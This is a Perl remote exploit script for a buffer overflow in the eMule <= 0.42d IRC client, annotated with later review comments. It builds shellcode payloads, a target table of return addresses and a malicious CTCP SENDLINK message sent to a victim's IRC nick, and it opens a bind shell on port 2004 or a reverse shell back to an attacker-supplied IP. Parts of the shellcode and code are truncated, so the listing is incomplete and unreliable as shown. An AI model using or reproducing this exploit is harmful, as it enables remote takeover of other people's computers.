# eMule <= 0.42d Remote Exploit by kcope
# exploits the DecodeBase16 buffer overflow in the eMule IRC client, reached through a CTCP SENDLINK message sent to the victim's IRC nick (see the PRIVMSG construction below)
# tested on WinXP SP1 / Win2k SP4
# bindport/connectback shellcode
# thanks Kostya Kortchinsky for his posting to bugtraq
# greetings to sander, blackzero, beginna, adize, A-cru and wY :p
# have fun!
# kcope, kingcope gmx net Apr 2004
use Socket;
use Getopt::Std;
# bindport shellcode (port 2004) thanks to metasploit
# NOTE(review): this listing is truncated -- only the first chunk of each
# shellcode string survived the paste. Each of $sc, $find_sc and $find_sccb
# ends in a dangling "." and $cbsc has no right-hand side at all, so as shown
# these lines do not parse; the original script continued each string over
# several more lines.
# $sc is raw bytes ("\x.." escapes) and is sent verbatim in a PRIVMSG, not
# hex-encoded (see the send sequence in the main script).
$sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x21\x39".
# connect back shellcode by lion, xor 0x21
# (stored XOR-encoded with key 0x21; the main script patches the callback
#  IP and port into it, XOR'ed with the same key, before sending)
$cbsc = 
# find shellcode in memory
# $find_sc / $find_sccb are hex-ASCII text, i.e. the base16 form that the
# vulnerable DecodeBase16 routine decodes; they ride inside the SENDLINK
# payload and, per the comment above, locate the raw stage sent earlier.
# First bytes decode to "mov edi, fs:[8]" on x86 (TEB stack base on Win32).
$find_sc = "648B3D08000000BA0100000042424264".
$find_sccb = "648B3D08000000BA0100000042424264".
$numtargets = 4;
# Target table: [display name, return address as little-endian hex text
# (0x0057f67a is written "7af65700"), number of "90" pad bytes placed before
# the overwritten return address]. The chosen entry is indexed by -t.
# NOTE(review): the opening "(" after "=" and the closing ");" are missing
# from this listing.
@targets = 
["eMule 0.42d", "7af65700", 76],
["eMule 0.42c", "514c5f00", 76],
["eMule 0.42b (Hotfix)", "d12e5f00", 76],
["eMule 0.42a", "012f5f00", 76]
# ["eMule 0.30e", "acf65b00", 20]
# The nick the attacker registers on the IRC server with.
$exploiting_nick = "eMuleIRC3713"; # change this nickname if needed
# Open a TCP connection to $ircserver:$ircport (package globals filled in by
# the option handling in the main script) on the bareword handle SOCK1.
# The outcome is reported through the global $bool ("yes"/"no"); the caller
# inspects $bool, there is no return value.
# NOTE(review): the sub's opening "{" and closing "}" are missing from this
# listing.
sub connecttoserver()
$bool = "yes";
# DNS failure is fatal (die), whereas a refused TCP connect below is only
# recorded in $bool -- the two failure modes are handled inconsistently.
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
# NOTE(review): after "||" perl treats "{ ... }" as an anonymous hash
# constructor, not a block; the assignment inside is still evaluated as a
# side effect, so this works, but `connect(...) or $bool = "no";` states the
# intent without relying on that.
connect(SOCK1, $paddr) || {$bool = "no"};
# Print the command-line synopsis and enumerate the selectable target indices
# from @targets (0 .. $numtargets-1) so the user can pick one with -t.
# NOTE(review): the closing braces of the for loop and of the sub are missing
# from this listing.
sub usage() {
print "usage: emule4x.pl -n <nick> -s <server> <-t type> [-p port] [-c <ip:port>]\r\n".
"use -c switch for reverse shell\r\n". 
"example: perl emule4x.pl -n emuleuser -s irc.somenet.com -t 0\r\n\r\ntarget types:\r\n";
for ($i=0; $i<$numtargets; $i++) {
print "\t[".$i."]...". $targets[$i][0]. "\r\n";
# ---- main script (no strict/warnings; every variable is a package global) ----
# NOTE(review): this listing is mangled. The closing braces, the getopts()
# call that fills %options, the usage()/exit calls in the error branches, the
# assignment of $usecb, the call to connecttoserver() and the "logged_in:"
# label are all absent. Read it as a sketch of the control flow, not as
# runnable code.
$| = 1; # unbuffered STDOUT so progress text appears before blocking socket reads
print "\r\n----------------------------------------------------------------------\r\n";
print "eMule <= 0.42d Remote Exploit by kcope . kingcope[at]gmx.net\r\n\r";
print "Tested on Win2k SP4/WinXP SP1\r\n";
print "----------------------------------------------------------------------\r\nLets have fun!\r\n\r\n";
# Fewer than four raw arguments cannot supply -n, -s and -t; the body of this
# branch (presumably usage() and exit) is not shown.
if (@ARGV < 4) {
# %options is expected to be populated by Getopt::Std::getopts (imported at
# the top of the file); the call itself is not visible here.
$nickname = $options{n}; # the victim's IRC nick
$ircserver = $options{s};
$type = $options{t};
# Validate the -t index against @targets; the exit after each message is not shown.
if (!defined $targets[$type][0]) {
print "Invalid target type.\r\n";
if (!defined $type) {
print "Please specify a target type.\r\n";
if (defined $options{p}) {
$ircport = $options{p};
} else {
$ircport = 6667;
# -c ip:port selects the connect-back payload; the argument is split on the
# first ":" only, with no check that a ":" was actually present.
# ($usecb is presumably set to 1 in this branch -- the line is not shown.)
if (defined $options{c}) {
$idx = index $options{c},":";
$cbip = substr $options{c},0,$idx;
$cbport = substr $options{c},$idx+1; 
print "Target type set to ".$targets[$type][0].".\r\n";
$ret = $targets[$type][1]; # return address, already little-endian hex text
$nops1 = "90" x $targets[$type][2]; # per-target pad in front of the return address
$nops2 = "90" x 40; # customize if needed
# Patch the callback address into $cbsc. Both the IPv4 address and the port
# are XOR'ed with 0x21 because the stub is stored encoded with that key (see
# its definition above) and decodes itself at run time.
if ($usecb eq 1) {
# gethostbyname() in scalar context (split's EXPR) yields the packed 4-byte
# address, or undef on failure -- there is no check, so an unresolvable
# host silently produces a garbage address in the payload.
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0x21);
$a2 = chr(ord($a2) ^ 0x21);
$a3 = chr(ord($a3) ^ 0x21);
$a4 = chr(ord($a4) ^ 0x21);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4); # IPv4 lives at offset 111 of the encoded stub
# NOTE(review): pack("s") is native-endian; reverse() only yields network
# byte order on a little-endian host. pack("n", $cbport) is the portable form.
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0x21);
$p2 = chr(ord($p2) ^ 0x21);
substr($cbsc, 118, 2, $p1 . $p2); # port (big-endian) at offset 118
print "Using connect back method on $cbip port $cbport.\r\n";
print "Connecting to $ircserver on port $ircport...";
# connecttoserver() (its call is not shown) reports a refused connect via $bool.
if ($bool eq "no")
print "Connection refused.\r\n";
# Minimal IRC registration under the attacker's nick; the USER fields are filler.
send(SOCK1,"NICK $exploiting_nick\r\n",0);
send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.dal.net\" :$exploiting_nick\r\n",0);
# Wait for numeric 376 (RPL_ENDOFMOTD) before sending anything to the victim.
while (<SOCK1>) { 
$line = $_;
# print $line;
# NOTE(review): "ne -1" compares index()'s numeric result as a string; it
# works, but "!= -1" (or ">= 0") is the numeric test that is meant.
if ((index $line, " 376 ") ne -1) {
goto logged_in; # the "logged_in:" label is not visible in this listing
# Keep the session alive during the MOTD by echoing the server's PING line
# back verbatim. NOTE(review): the compliant reply is "PONG <token>"; echoing
# "PING" only passes if the ircd counts any traffic as activity.
if ((index $line, "PING") ne -1) {
send(SOCK1, $line, 0); 
print " ok\r\n"; 
print "Sending buffers to $nickname...";
# 005f4c51 eMule 0.42c (514c5f00)
# 0057f67a eMule 0.42d (7AF65700)
# Delivery is two PRIVMSGs to the victim's nick:
#  1. the raw stage ($sc or $cbsc) as plain message text, so it ends up
#     somewhere in the eMule process's memory;
#  2. a CTCP SENDLINK whose "|...|" argument is hex text for DecodeBase16:
#     $nops1, "EB07" + "9090", the target's return address, "90" +
#     "6681EC4000", $nops2, then the hex-encoded finder stub. On x86 "EB 07"
#     looks like "jmp short +7" (skipping the two nops, the address and the
#     single nop) and "66 81 EC 40 00" like "sub sp,0x40", presumably to move
#     the stack pointer off the payload before the finder runs -- decode to
#     confirm. The finder (per its comment above) then locates stage 1.
# Detection hint: a PRIVMSG carrying "\x01SENDLINK|" followed by a long run
# of hex digits is the on-the-wire signature of this attack.
if ($usecb eq 1) {
send(SOCK1, "PRIVMSG $nickname :$cbsc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK\|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sccb ."\|\x01\r\n", 0);
} else {
send(SOCK1, "PRIVMSG $nickname :$sc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK\|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sc ."\|\x01\r\n", 0); 
if ($usecb ne 1) {
# The bind-shell stage listens on TCP 2004 on the victim (see the $sc comment).
print "\r\nNow try connecting to ".$nickname."'s ip on port 2004.\r\n";
} else {
print "\r\nWatch at your netcat for some shell.\r\n"; 
# Read (and discard) nine server lines before finishing, so the PRIVMSGs are
# not cut off by an immediate exit; the values are never used.
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
print " done\r\n";
DAS ist ein gutes Spiel
fuck off p2p